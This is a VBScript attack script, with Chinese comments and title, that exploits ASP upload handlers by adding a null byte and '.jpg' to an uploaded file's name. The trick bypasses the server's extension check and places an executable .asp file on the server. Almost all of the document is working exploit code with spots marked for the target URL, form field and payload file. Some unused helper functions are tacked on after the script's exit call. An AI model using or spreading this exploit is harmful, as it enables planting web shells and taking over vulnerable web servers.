ASP上传漏洞之利用CHR(0)绕过扩展名检测脚本

option explicit

function file_get_contents(filename)
dim fso, f
set fso = wsh.createobject("scripting.filesystemobject")
set f = fso.opentextfile(filename, 1)
file_get_contents = f.readall
f.close
set f = nothing
set fso = nothing
end function

' 代码修改自 http://www.motobit.com/tips/detpg_uploadvbsie/
class fileuploadattack
private m_objwinhttp
private m_strurl
private m_strfieldname

private sub class_initialize()
set m_objwinhttp = wsh.createobject( _
"winhttp.winhttprequest.5.1")
end sub

private sub class_terminate()
set m_objwinhttp = nothing
end sub

public sub seturl(url)
m_strurl = url
end sub

public sub setfieldname(name)
m_strfieldname = name
end sub

'infrormations in form field header.
function mpfields(fieldname, filename, contenttype)
dim mptemplate 'template for multipart header
mptemplate = "content-disposition: form-data; name=""{field}"";" + _
" filename=""{file}""" + vbcrlf + _
"content-type: {ct}" + vbcrlf + vbcrlf
dim out
out = replace(mptemplate, "{field}", fieldname)
out = replace(out, "{file}", filename)
mpfields = replace(out, "{ct}", contenttype)
end function
'converts ole string to multibyte string
function stringtomb(s)
dim i, b
for i = 1 to len(s)
b = b & chrb(asc(mid(s, i, 1)))
next
stringtomb = b
end function

'build multipart/form-data document with file contents and header info
function buildformdata(filecontents, boundary, _
filename, fieldname)
dim formdata, pre, po
const contenttype = "application/upload"

'the two parts around file contents in the multipart-form data.
pre = "--" + boundary + vbcrlf + mpfields(fieldname, _
filename, contenttype)
po = vbcrlf + "--" + boundary + "--" + vbcrlf

'build form data using recordset binary field
const adlongvarbinary = 205
dim rs: set rs = wsh.createobject("adodb.recordset")
rs.fields.append "b", adlongvarbinary, _
len(pre) + lenb(filecontents) + len(po)
rs.open
rs.addnew
dim lendata
'convert pre string value to a binary data
lendata = len(pre)
rs("b").appendchunk (stringtomb(pre) & chrb(0))
pre = rs("b").getchunk(lendata)
rs("b") = ""

'convert po string value to a binary data
lendata = len(po)
rs("b").appendchunk (stringtomb(po) & chrb(0))
po = rs("b").getchunk(lendata)
rs("b") = ""

'join pre + filecontents + po binary data
rs("b").appendchunk (pre)
rs("b").appendchunk (filecontents)
rs("b").appendchunk (po)
rs.update
formdata = rs("b")
rs.close
buildformdata = formdata
end function


public function sendfile(filename)
const boundary = "---------------------------0123456789012"
m_objwinhttp.open "post", m_strurl, false
m_objwinhttp.setrequestheader "content-type", _
"multipart/form-data; boundary=" + boundary

dim filecontents, formdata
'get source file as a binary data.
filecontents = file_get_contents(filename)

' 下面构造了恶意文件扩展名chr(0) & .jpg
'build multipart/form-data document
formdata = buildformdata(filecontents, boundary, _
filename & chr(0) & ".jpg", m_strfieldname)

m_objwinhttp.send formdata
sendfile = m_objwinhttp.status
end function

public function gettext()
gettext = m_objwinhttp.responsetext
end function
end class

function vbmain()
vbmain = 0

dim fileupload
set fileupload = new fileuploadattack
' 需要修改下面内容为合适内容
' 上传url
fileupload.seturl "http://localhost/upload/uploadfile.asp"
fileupload.setfieldname "filepath" ' 上传表单框的name
' 需上传文件路径
if fileupload.sendfile("e:\projects\asp\index.asp")=200 then
msgbox "上传成功" & fileupload.gettext()
else
msgbox "失败"
end if
set fileupload = nothing
end function

call wscript.quit(vbmain())

' 将指定charset的字符串str转换为二进制
function strtobin(str, charset)
with wsh.createobject("adodb.stream")
.type = 2
.mode = 3
.open
.charset = charset
.writetext str
.flush
.position = 0
.type = 1

strtobin = .read()
.close
end with
end function

filecontents = strtobin(file_get_contents(filename), "ascii")

'returns file contents as a binary data
function getfile(filename)
dim stream: set stream = createobject("adodb.stream")
stream.type = 1 'binary
stream.open
stream.loadfromfile filename
getfile = stream.read
stream.close
set stream = nothing
end function